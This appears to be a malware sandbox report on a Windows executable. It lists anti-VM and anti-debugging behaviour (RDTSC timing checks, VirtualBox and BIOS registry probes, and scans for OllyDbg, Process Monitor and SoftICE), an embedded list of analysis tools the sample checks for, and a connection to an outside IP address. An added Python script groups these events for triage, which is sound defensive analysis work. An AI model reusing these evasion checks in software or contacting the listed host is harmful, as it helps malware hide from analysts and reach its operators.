Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731561 second address: 77315A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c jmp 00007F9334DAF9A8h 0x00000011 pop esi 0x00000012 pushad 0x00000013 mov al, 46h 0x00000015 movsx edx, ax 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9334DAF9A1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77315A1 second address: 77315B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77315B1 second address: 77315B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77315B5 second address: 77315CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9334BA002Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7720692 second address: 7720708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9334DAF9A4h 0x00000011 sbb ch, 00000038h 0x00000014 jmp 00007F9334DAF99Bh 0x00000019 popfd 0x0000001a mov dl, al 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F9334DAF9A0h 0x00000025 sub esi, 474D4698h 0x0000002b jmp 00007F9334DAF99Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 call 00007F9334DAF9A6h 0x00000038 pop esi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0008 second address: 76C000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C000E second address: 76C009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334DAF9A7h 0x00000009 add cx, 634Eh 0x0000000e jmp 00007F9334DAF9A9h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F9334DAF99Ah 0x0000001f push eax 0x00000020 jmp 00007F9334DAF99Bh 0x00000025 xchg eax, ebp 0x00000026 jmp 00007F9334DAF9A6h 0x0000002b mov ebp, esp 0x0000002d jmp 00007F9334DAF9A0h 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F9334DAF99Ah 0x0000003c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C009C second address: 76C00A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C00A0 second address: 76C00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C075D second address: 76C076C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C076C second address: 76C07E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334DAF99Fh 0x00000009 add si, BDFEh 0x0000000e jmp 00007F9334DAF9A9h 0x00000013 popfd 0x00000014 jmp 00007F9334DAF9A0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e jmp 00007F9334DAF99Eh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F9334DAF9A0h 0x0000002b adc eax, 143C3F58h 0x00000031 jmp 00007F9334DAF99Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C07E6 second address: 76C0840 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9334BA0038h 0x00000008 or esi, 754A49B8h 0x0000000e jmp 00007F9334BA002Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F9334BA0039h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9334BA002Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0840 second address: 76C0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0850 second address: 76C0866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0D7B second address: 76C0D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9334DAF99Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0D9F second address: 76C0DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DB1 second address: 76C0DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DB5 second address: 76C0DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9334BA002Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DCA second address: 76C0DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DE1 second address: 76C0DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DE5 second address: 76C0DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77109FB second address: 77109FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77109FF second address: 7710A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7710A05 second address: 7710A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7710A0B second address: 7710A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F005E second address: 76F00CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007F9334BA0038h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ax, C4D3h 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 call 00007F9334BA0035h 0x0000001e jmp 00007F9334BA0030h 0x00000023 pop ecx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F9334BA0033h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F00CA second address: 76F00CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F00CE second address: 76F00D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F00D4 second address: 76F0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F9334DAF99Dh 0x00000014 and si, B406h 0x00000019 jmp 00007F9334DAF9A1h 0x0000001e popfd 0x0000001f pop eax 0x00000020 mov dh, 17h 0x00000022 popad 0x00000023 sub esp, 44h 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F9334DAF9A5h 0x0000002d jmp 00007F9334DAF99Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F9334DAF99Bh 0x0000003e sub eax, 58BAF89Eh 0x00000044 jmp 00007F9334DAF9A9h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F0172 second address: 76F0189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA0033h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F0189 second address: 76F01B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9334DAF99Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01B7 second address: 76F01BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01BD second address: 76F01E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F9334DAF9A9h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01E6 second address: 76F01EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01EC second address: 76F01F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01F2 second address: 76F01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01F6 second address: 76F020C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ch, bl 0x0000000c movzx ecx, di 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov esi, edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F020C second address: 76F0270 instructions: 0x00000000 rdtsc 0x00000002 call 00007F9334BA0035h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F9334BA0031h 0x00000010 adc ah, FFFFFFB6h 0x00000013 jmp 00007F9334BA0031h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, edi 0x0000001b jmp 00007F9334BA002Eh 0x00000020 push eax 0x00000021 jmp 00007F9334BA002Bh 0x00000026 xchg eax, edi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F0270 second address: 76F028B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F028B second address: 76F02BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9334BA002Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F02BA second address: 76F0333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+24h], 00000000h 0x00000011 pushad 0x00000012 mov cx, 82D3h 0x00000016 mov eax, 7989792Fh 0x0000001b popad 0x0000001c lock bts dword ptr [edi], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F9334DAF9A7h 0x0000002a sbb ax, B86Eh 0x0000002f jmp 00007F9334DAF9A9h 0x00000034 popfd 0x00000035 call 00007F9334DAF9A0h 0x0000003a pop eax 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeSpecial instruction interceptor: First address: 16BB954 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CMpuGis28l.exeSpecial instruction interceptor: First address: 185EA33 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CMpuGis28l.exeSpecial instruction interceptor: First address: 1874674 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CMpuGis28l.exeSpecial instruction interceptor: First address: 18EEAB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CMpuGis28l.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\CMpuGis28l.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D005B5 sldt word ptr [eax+00000000h]
Source: C:\Users\user\Desktop\CMpuGis28l.exe TID: 7016Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F7255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F7255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: CMpuGis28l.exe, CMpuGis28l.exe, 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: CMpuGis28l.exeBinary or memory string: Hyper-V RAW
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: CMpuGis28l.exe, 00000000.00000003.2522201658.0000000001CFD000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000003.2522407945.0000000001CFE000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000003.2522667197.0000000001D0D000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000003.2522167712.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000002.2532514367.0000000001D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: CMpuGis28l.exe, 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CMpuGis28l.exe, 00000000.00000003.2476420901.0000000001CA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exeSystem information queried: ModuleInformation
Source: C:\Users\user\Desktop\CMpuGis28l.exeProcess information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\CMpuGis28l.exeThread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile opened: NTICE
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile opened: SICE
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\CMpuGis28l.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\CMpuGis28l.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\CMpuGis28l.exeProcess queried: DebugPort
Source: CMpuGis28l.exe, CMpuGis28l.exe, 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\CMpuGis28l.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\CMpuGis28l.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\CMpuGis28l.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\CMpuGis28l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
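The evasion and anti-debugging entries above are one long flat list: RDTSC pairs wrapped in junk instructions, window-class scans for ollydbg and Process Monitor, opens of the SoftICE device names NTICE/SICE/SIWVID, ThreadHideFromDebugger, DebugPort queries and VirtualBox registry strings. The Python below is an added example by the editor, not code from Joe Sandbox, showing how a triage script can fold such lines into the techniques they evidence and measure how much code each RDTSC block times. The event list is a constructed subset of this report's own lines with the Source cell removed; the rule set and the ATT&CK T-numbers are the editor's mapping, not the sandbox's.

```python
import re
from collections import defaultdict

# Constructed input: a subset of this report's behaviour lines with the
# "Source: <path>" cell removed, so each entry is just the event text.
SAMPLE_EVENTS = [
    "RDTSC instruction interceptor: First address: 76F00CA second address: 76F00CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: 76F00CE second address: 76F00D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
    "Special instruction interceptor: First address: 16BB954 instructions caused by: Self-modifying code",
    r"Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    "Code function: 0_3_01D005B5 sldt word ptr [eax+00000000h]",
    "Thread information set: HideFromDebugger",
    "Open window title or class name: procmon_window_class",
    "Open window title or class name: ollydbg",
    "File opened: SICE",
    "File opened: NTICE",
    "Process queried: DebugPort",
    r"Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF",
]

# (label, ATT&CK id, pattern). First matching rule wins. The grouping and the
# T-numbers are the editor's mapping, not Joe Sandbox's.
RULES = [
    ("RDTSC timing check", "T1497.003", re.compile(r"^RDTSC instruction interceptor")),
    ("Self-modifying code", "T1027", re.compile(r"caused by: Self-modifying code")),
    ("BIOS/driver registry probe", "T1497.001",
     re.compile(r"Registry key queried: .* name: (SystemBiosVersion|VideoBiosVersion|DriverDesc)")),
    ("SLDT-based VM check", "T1497.001", re.compile(r"Code function: .*\bsldt\b")),
    ("ThreadHideFromDebugger", "T1622", re.compile(r"Thread information set: HideFromDebugger")),
    ("Analysis-tool window scan", "T1518.001", re.compile(r"Open window title or class name: (.+)$")),
    ("SoftICE device probe", "T1622", re.compile(r"File opened: (NTICE|SICE|SIWVID)$")),
    ("DebugPort query", "T1622", re.compile(r"Process queried: DebugPort")),
    ("VirtualBox artifact string", "T1497.001", re.compile(r"VBox|VBOX__", re.IGNORECASE)),
]

ADDR_RX = re.compile(r"0x[0-9A-Fa-f]{8} ")  # Joe Sandbox prefixes each instruction with its offset


def classify(events):
    """Map each event to the first matching rule: {(label, id): [captured value or full line]}."""
    hits = defaultdict(list)
    for line in events:
        for label, tid, rx in RULES:
            m = rx.search(line)
            if m:
                hits[(label, tid)].append(m.group(1) if m.groups() else line)
                break
    return dict(hits)


def rdtsc_window(line):
    """Instructions executed between the two rdtsc reads of one interceptor block,
    i.e. the code whose duration the sample measures. None if the block has <2 reads."""
    listing = line.partition("instructions: ")[2]
    mnems = [seg.split()[0] for seg in ADDR_RX.split(listing) if seg.strip()]
    if mnems.count("rdtsc") < 2:
        return None
    first = mnems.index("rdtsc")
    last = len(mnems) - 1 - mnems[::-1].index("rdtsc")
    return last - first - 1


def summarize(events):
    """Triage view: technique ids seen, the concrete tool names/devices probed,
    the size of each timed RDTSC window, and anything the rules did not cover."""
    hits = classify(events)
    return {
        "techniques": sorted({tid for _, tid in hits}),
        "tool_windows": hits.get(("Analysis-tool window scan", "T1518.001"), []),
        "debugger_devices": hits.get(("SoftICE device probe", "T1622"), []),
        "rdtsc_windows": [rdtsc_window(e) for e in events if e.startswith("RDTSC instruction interceptor")],
        "unclassified": [e for e in events if not any(rx.search(e) for _, _, rx in RULES)],
    }
```

Feed `summarize()` the full behaviour list after stripping the Source cell; the `unclassified` bucket is the list to read by hand, and a small `rdtsc_windows` value (a handful of pushes and pops between the two reads) is the signature of a check tuned to catch hypervisors and emulators that trap RDTSC rather than slow code.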

Stealing of Sensitive Information

Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Source: global trafficTCP traffic: 192.168.2.12:49711 -> 185.121.15.192:80
MITRE ATT&CK matrix (Joe Sandbox mapping). The leading number is the count of matched signatures for that technique; entries without a number are the matrix's unmatched placeholder cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 25 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 741 Security Software Discovery; 25 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: 1 Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
